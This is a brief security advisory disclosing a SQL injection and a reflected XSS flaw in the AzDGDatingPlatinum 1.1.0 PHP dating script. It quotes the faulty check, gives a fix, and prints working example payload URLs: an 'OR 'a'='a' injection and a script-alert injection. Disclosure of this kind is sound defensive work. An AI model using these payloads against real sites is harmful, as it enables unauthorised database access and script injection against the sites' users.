ADZ Security Team =================== Info Program: AzDGDatingPlatinum Version: tested 1.1.0 Modules: view.php, members/index.php Bug type: SQL Injection, XSS Vendor site: http://www.azdg.com/ Vendor Informed: Yes =================== Bug Info SQL Injection: At module view.php I've found a logical error: // code if (isset($id) || $id != "" || is_numeric($id)) { $result = mysql_query("SELECT * FROM ".C_MYSQL_MEMBERS." WHERE id ='$id'ANDstatus = '7'"); // code As you see, here is no check about some "bad" symbols like quote.... Replace "||" to "&&" to fix it (gpc_magic_quotes must be Off to exploit this bug) Example: http://[host]/[path]/view.php?l=default&id=3'%20OR%20'a'='a'/* http://127.0.0.1/dating.lan/members/index.php?l=default&a=v&from=[SQL CODE] - Second "bad" module without $from checking XSS: Simple XSS-bugs, like so: http://[host]/[path]/view.php?l=default&id=3%3Cscript%3Ealert();%3C/script%3E =================== Contact ADZ Security Team URL: http://adz.void.ru/ IRC: #adz @ QuakeNet MAIL: kre0n@mail.ru, adz.kreon@gmail.com (for non-russian users)